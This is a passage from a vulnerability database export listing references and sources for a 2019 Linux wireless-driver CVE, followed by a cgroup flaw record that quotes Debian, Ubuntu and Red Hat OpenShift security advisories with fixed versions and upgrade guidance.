"url": "https://usn.ubuntu.com/4162-2/"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
},
{
"trust": 1.6,
"url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14816"
},
{
"trust": 1.6,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
},
{
"trust": 1.6,
"url": "https://seclists.org/bugtraq/2019/nov/11"
},
{
"trust": 1.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
},
{
"trust": 1.6,
"url": "https://usn.ubuntu.com/4157-2/"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2020:0653"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2020:1266"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1744149"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2020:1353"
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
},
{
"trust": 0.6,
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7caac62ed598a196d6ddf8d9c121e12e082cac3a"
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2020:1347"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192984-1.html"
},
{
"trust": 0.6,
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192658-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192651-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192424-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192414-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192412-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192648-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/156608/red-hat-security-advisory-2020-0664-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-buffer-overflow-via-net-wireless-marvell-mwifiex-30180"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3570/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1248/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0766/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4346/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0415/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157140/red-hat-security-advisory-2020-1347-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3835/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/156020/red-hat-security-advisory-2020-0174-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3817/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0790/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/154897/ubuntu-security-notice-usn-4157-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/156216/red-hat-security-advisory-2020-0375-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1172/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3897/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3064/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17133"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15902"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14895"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14895"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14898"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14901"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14901"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14898"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18232"
},
{
"trust": 0.2,
"url": "https://usn.ubuntu.com/4163-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/solutions/3523601"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14815"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18660"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3693"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-18559"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3846"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8912"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11487"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11487"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18559"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8912"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3693"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18660"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10126"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20976"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17666"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1019.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1020.20"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4157-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-32.34"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15504"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1024.25"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16714"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1023.24"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1020.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1021.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1027.30~16.04.1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4162-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1048.48"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1052.54~16.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1047.50"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1027.30"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-66.75"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1059.68"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1061.66"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1046.49"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1049.53"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15918"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1066.73"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-66.75~16.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1052.54"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4163-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-166.195"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1128.136"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1124.133"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1060.67"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1096.107"
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "156020"
},
{
"db": "PACKETSTORM",
"id": "157042"
},
{
"db": "PACKETSTORM",
"id": "156213"
},
{
"db": "PACKETSTORM",
"id": "156603"
},
{
"db": "PACKETSTORM",
"id": "154897"
},
{
"db": "PACKETSTORM",
"id": "154934"
},
{
"db": "PACKETSTORM",
"id": "154946"
},
{
"db": "PACKETSTORM",
"id": "156216"
},
{
"db": "PACKETSTORM",
"id": "154935"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
},
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "PACKETSTORM",
"id": "156020",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157042",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "156213",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "156603",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154897",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154934",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154946",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "156216",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154935",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2019-14816",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-01-21T19:10:15",
"db": "PACKETSTORM",
"id": "156020",
"ident": null
},
{
"date": "2020-04-01T15:21:52",
"db": "PACKETSTORM",
"id": "157042",
"ident": null
},
{
"date": "2020-02-05T18:37:11",
"db": "PACKETSTORM",
"id": "156213",
"ident": null
},
{
"date": "2020-03-03T14:09:01",
"db": "PACKETSTORM",
"id": "156603",
"ident": null
},
{
"date": "2019-10-17T15:18:45",
"db": "PACKETSTORM",
"id": "154897",
"ident": null
},
{
"date": "2019-10-22T17:26:43",
"db": "PACKETSTORM",
"id": "154934",
"ident": null
},
{
"date": "2019-10-23T18:28:39",
"db": "PACKETSTORM",
"id": "154946",
"ident": null
},
{
"date": "2020-02-05T18:49:35",
"db": "PACKETSTORM",
"id": "156216",
"ident": null
},
{
"date": "2019-10-22T17:26:50",
"db": "PACKETSTORM",
"id": "154935",
"ident": null
},
{
"date": "2019-08-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201908-2176",
"ident": null
},
{
"date": "2019-09-20T19:15:11.767000",
"db": "NVD",
"id": "CVE-2019-14816",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-03-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201908-2176",
"ident": null
},
{
"date": "2024-11-21T04:27:25.253000",
"db": "NVD",
"id": "CVE-2019-14816",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "154897"
},
{
"db": "PACKETSTORM",
"id": "154934"
},
{
"db": "PACKETSTORM",
"id": "154935"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
],
"trust": 0.9
},
"title": {
"_id": null,
"data": "Linux kernel Buffer error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
],
"trust": 0.6
}
}
VAR-202201-0496
Vulnerability from variot - Updated: 2026-03-09 20:52An unprivileged write to the file handler flaw in the Linux kernel's control groups and namespaces subsystem was found in the way users have access to some less privileged process that are controlled by cgroups and have higher privileged parent process. It is actually both for cgroup2 and cgroup1 versions of control groups. A local user could use this flaw to crash the system or escalate their privileges on the system. Linux Kernel There is an authentication vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The Linux kernel is the kernel used by the American Linux Foundation's open source operating system Linux. Attackers can use this vulnerability to bypass the restrictions of the Linux kernel through Cgroup Fd Writing to elevate their privileges. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-5127-1 security@debian.org https://www.debian.org/security/ Salvatore Bonaccorso May 02, 2022 https://www.debian.org/security/faq
Package : linux CVE ID : CVE-2021-4197 CVE-2022-0168 CVE-2022-1016 CVE-2022-1048 CVE-2022-1158 CVE-2022-1195 CVE-2022-1198 CVE-2022-1199 CVE-2022-1204 CVE-2022-1205 CVE-2022-1353 CVE-2022-1516 CVE-2022-26490 CVE-2022-27666 CVE-2022-28356 CVE-2022-28388 CVE-2022-28389 CVE-2022-28390 CVE-2022-29582
Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks. The security impact is negligible as CAP_SYS_ADMIN inherently gives the ability to deny service.
CVE-2022-1016
David Bouman discovered a flaw in the netfilter subsystem where the
nft_do_chain function did not initialize register data that
nf_tables expressions can read from and write to.
CVE-2022-1158
Qiuhao Li, Gaoning Pan, and Yongkang Jia discovered a bug in the
KVM implementation for x86 processors. A local user with access to
/dev/kvm could cause the MMU emulator to update page table entry
flags at the wrong address.
CVE-2022-1199, CVE-2022-1204, CVE-2022-1205
Duoming Zhou discovered race conditions in the AX.25 hamradio
protocol, which could lead to a use-after-free or null pointer
dereference.
CVE-2022-1353
The TCS Robot tool found an information leak in the PF_KEY
subsystem.
CVE-2022-1516
A NULL pointer dereference flaw in the implementation of the X.25
set of standardized network protocols, which can result in denial
of service.
This driver is not enabled in Debian's official kernel
configurations.
CVE-2022-26490
Buffer overflows in the STMicroelectronics ST21NFCA core driver can
result in denial of service or privilege escalation.
This driver is not enabled in Debian's official kernel
configurations.
CVE-2022-27666
"valis" reported a possible buffer overflow in the IPsec ESP
transformation code.
For the stable distribution (bullseye), these problems have been fixed in version 5.10.113-1.
We recommend that you upgrade your linux packages.
For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmJwRg9fFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0S8bw//bsMGzd7yC5QHR9/G3Vxn10HSYSy9vkPdOrg9nt58xCygMTvj9G4Ur7P5 SqPulxdczzDQgAEl/UVzmCifFMAbfi77w+0feha6zbrjz4yD8vtmk1caVmvbqOxE MsS7GKyFdRxvqWoCG1boIZZ5aKFCgXug4cY1nARJo4tadF3W3lZw9LP9+kdDJ0Z8 4zfzd1fa0tn6Bk9lqVvaks3zVxLA2Iev0yaLGpWPbsrqiSEnB/e1tWAQX7CVRUNT kY48YpAsGraOyjTMkmLyeXNYHwdNYfKR27DK/4CpXeVzqADlMqKtFOp0lvQhF54t KcBvJjvQsJ5ua7qjoJS97SLlMp7aZ3DvBnz28hn3vDp5iqFDTdLSmuPqJGy5JAOD JdijjSFCB2tTjDLBha+1mGAB2kJG8Kj0rcEiQTyFARejOoCIQg9R3EWfp5HI8DCn e4fGZdRATm6Qe9ofBlVmKmVpV36NaiZuy3UA8lhKTlJsjIhwnFB/WknG93/G64HK wMSkbbXDPoYgH06emh0RIXzddfHHO+mZBgUysHBX5pE0KdDazPleFGn5yOdlX8k5 5OT35Cga+hRVT9KNQfz4Me0AEt0kEwyMIUM6R49KvB8eQ9Az1OjO0yWONz4F5mDW 0HoSJCW+9gZzljIebL+odSyT/dvUZpP/xVzE8DRukDyn99GY6y4= =vCuc -----END PGP SIGNATURE----- . ========================================================================== Ubuntu Security Notice USN-5513-1 July 13, 2022
linux-aws vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux-aws: Linux kernel for Amazon Web Services (AWS) systems
Details:
Norbert Slusarek discovered a race condition in the CAN BCM networking protocol of the Linux kernel leading to multiple use-after-free vulnerabilities. A local attacker could use this issue to execute arbitrary code. (CVE-2021-3609)
Likang Luo discovered that a race condition existed in the Bluetooth subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3752)
It was discovered that the NFC subsystem in the Linux kernel contained a use-after-free vulnerability in its NFC Controller Interface (NCI) implementation. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3760)
Szymon Heidrich discovered that the USB Gadget subsystem in the Linux kernel did not properly restrict the size of control requests for certain gadget types, leading to possible out of bounds reads or writes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-39685)
It was discovered that the Ion Memory Manager subsystem in the Linux kernel contained a use-after-free vulnerability. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-39714)
Eric Biederman discovered that the cgroup process migration implementation in the Linux kernel did not perform permission checks correctly in some situations. (CVE-2021-4197)
Lin Ma discovered that the NFC Controller Interface (NCI) implementation in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-4202)
Sushma Venkatesh Reddy discovered that the Intel i915 graphics driver in the Linux kernel did not perform a GPU TLB flush in some situations. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2022-0330)
It was discovered that the PF_KEYv2 implementation in the Linux kernel did not properly initialize kernel memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2022-1353)
It was discovered that the virtual graphics memory manager implementation in the Linux kernel was subject to a race condition, potentially leading to an information leak. (CVE-2022-1419)
Minh Yuan discovered that the floppy disk driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2022-1652)
It was discovered that the Atheros ath9k wireless device driver in the Linux kernel did not properly handle some error conditions, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-1679)
It was discovered that the Marvell NFC device driver implementation in the Linux kernel did not properly perform memory cleanup operations in some situations, leading to a use-after-free vulnerability. A local attacker could possibly use this to cause a denial of service (system) or execute arbitrary code. (CVE-2022-1734)
It was discovered that some Intel processors did not completely perform cleanup actions on multi-core shared buffers. A local attacker could possibly use this to expose sensitive information. (CVE-2022-21123)
It was discovered that some Intel processors did not completely perform cleanup actions on microarchitectural fill buffers. A local attacker could possibly use this to expose sensitive information. (CVE-2022-21125)
It was discovered that some Intel processors did not properly perform cleanup during specific special register write operations. A local attacker could possibly use this to expose sensitive information. (CVE-2022-21166)
It was discovered that the USB Gadget file system interface in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-24958)
赵子轩 discovered that the 802.2 LLC type 2 driver in the Linux kernel did not properly perform reference counting in some error conditions. (CVE-2022-28356)
It was discovered that the 8 Devices USB2CAN interface implementation in the Linux kernel did not properly handle certain error conditions, leading to a double-free. (CVE-2022-28388)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: linux-image-4.4.0-1109-aws 4.4.0-1109.115 linux-image-aws 4.4.0.1109.106
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://ubuntu.com/security/notices/USN-5513-1 CVE-2021-3609, CVE-2021-3752, CVE-2021-3760, CVE-2021-39685, CVE-2021-39714, CVE-2021-4197, CVE-2021-4202, CVE-2022-0330, CVE-2022-1353, CVE-2022-1419, CVE-2022-1652, CVE-2022-1679, CVE-2022-1734, CVE-2022-21123, CVE-2022-21125, CVE-2022-21166, CVE-2022-24958, CVE-2022-28356, CVE-2022-28388 . Summary:
Red Hat OpenShift Container Platform release 4.9.45 is now available with updates to packages and images that fix several bugs and add enhancements.
This release includes a security update for Red Hat OpenShift Container Platform 4.9.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.9.45. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2022:5878
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html
Security Fix(es):
- openshift: oauth-serving-cert configmap contains cluster certificate private key (CVE-2022-2403)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.45-x86_64
The image digest is sha256:8ab373599e8a010dffb9c7ed45e01c00cb06a7857fe21de102d978be4738b2ec
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.45-s390x
The image digest is sha256:1dde8a7134081c82012a812e014daca4cba1095630e6d0c74b51da141d472984
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.45-ppc64le
The image digest is sha256:ec1fac628bec05eb6425c2ae9dcd3fca120cd1a8678155350bb4c65813cfc30e
All OpenShift Container Platform 4.9 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
2009024 - Unable to complete cluster destruction, some ports are left over 2055494 - console operator should report Upgradeable False when SAN-less certs are used 2083554 - post 1.23 rebase: regression in service-load balancer reliability 2087021 - configure-ovs.sh fails, blocking new RHEL node from being scaled up on cluster without manual reboot 2088539 - Openshift route URLs starting with double slashes stopped working after update to 4.8.33 - curl version problems 2091806 - Cluster upgrade stuck due to "resource deletions in progress" 2095320 - [4.9] Bootimage bump tracker 2097157 - [4.9z] During ovnkube-node restart all host conntrack entries are flushed, leading to traffic disruption 2100786 - [OCP 4.9] Ironic cannot match "wwn" rootDeviceHint for a multipath device 2101664 - disabling ipv6 router advertisements using "all" does not disable it on secondary interfaces 2101959 - CVE-2022-2403 openshift: oauth-serving-cert configmap contains cluster certificate private key 2103982 - [4.9] AWS EBS CSI driver stuck removing EBS volumes - GetDeviceMountRefs check failed 2105277 - NetworkPolicies: ovnkube-master pods crashing due to panic: "invalid memory address or nil pointer dereference" 2105453 - Node reboot causes duplicate persistent volumes 2105654 - egressIP panics with nil pointer dereference 2105663 - APIRequestCount does not identify some APIs removed in 4.9 2106655 - Kubelet slowly leaking memory and pods eventually unable to start 2108538 - [4.9.z backport] br-ex not created due to default bond interface having a different mac address than expected 2108619 - ClusterVersion history pruner does not always retain initial completed update entry
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
